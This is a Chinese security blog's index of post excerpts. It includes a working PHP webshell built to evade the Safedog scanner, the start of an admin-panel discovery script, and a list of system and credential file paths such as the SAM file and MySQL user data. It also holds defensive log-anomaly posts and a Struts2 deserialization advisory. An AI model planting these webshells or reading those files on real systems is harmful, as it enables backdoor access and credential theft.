记录一些php webshell代码 最新版安全狗扫描结果： 下面是代码，代码顺序为图中顺序： <?php $arr = array('a','s','s','e','r','t'); $func = ''; for($i=0;$i<count($arr);$i++) { $func .= $func . $arr[$i]; } $func($_REQUEST['c']); ?> <?php    @$_++;  $__=("#...

阅读全文>>

网上流传的一个找后台的姿势，记录一下： <?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_POST => true, CURLOPT_SSL_V...

阅读全文>>

C:/boot.ini //查看系统版本 C:/WindowsSystem32inetsrvMetaBase.xml //IIS配置文件 C:/Windowsrepairsam //存储系统初次安装的密码 C:/Program Filesmysqlmy.ini //Mysql配置 C:/Program Filesmysqldatamysqluser.MYD //Mysql root C:/Windowsphp.ini //php配置信息 C:/Windowsmy.ini //Mysql配置信息C:Windowswin.ini //Windows系统的一个基本系统配置文件 Li...

阅读全文>>

在分析Web日志流程中，寻找可疑请求、寻找异常访问者为分析流程中的基础流程，传统的做法是使用正则进行筛选，而这些正则则是通过我们已知的安全经验编写出来的，此时我们可以通过尝试一些新的方法~ 一、数据准备 同上篇 二、算法测试 依赖库地址：[K-Means Java实现](https://sourceforge.net/p/yuanboshekmeans/code/ref/master/) 我们下载kmeans库之后将其引用到项目中，并编写测试Demo，测试库的可用性。测试Demo如图：  可以看到我们使用了4个3维的样本数据，数据...

阅读全文>>

 在日常日志分析中，我们通常使用自己的“安全经验”编写出关于攻击的一些规则去寻找日志中攻击行为，从而得到一段时间内的异常访问者IP，即所有“命中过规则”的访问者，而面对千变万化的Web应用、不断更新迭代的技术以及攻击者变幻莫测的攻击手法，难免我们有时无法紧随攻击者的步伐，如果某一个攻击者发起过攻击但是所使用的攻击手法不在我们所已知的安全经验范围内，此时这个恶意的访问者便会从我们的关注范围溜走。      此时我们可以另辟蹊径，忘掉那些已知的安全规则，尝试使用不同的方法在日志中找到异常访问者。此时我们可以使用异常检测算法中的LOF算法（Loca...

阅读全文>>

漏洞影响 Struts 2.5 – Struts 2.5.12 版本， 漏洞概述 Struts2 REST插件使用带有XStream程序的XStream Handler进行未经任何代码过滤的反序列化操作，这可能在反序列化XML payloads时导致远程代码执行。任意攻击者都可以构造恶意的XML内容提升权限。 其实我觉得此次漏洞并非Struts的主要责任，问题出在XStream组件上 XStream介绍： XStream是一个Java对象和XML相互转换的工具。提供了所有的基础类型、数组、集合等类型直接转...

阅读全文>>

阅读全文>>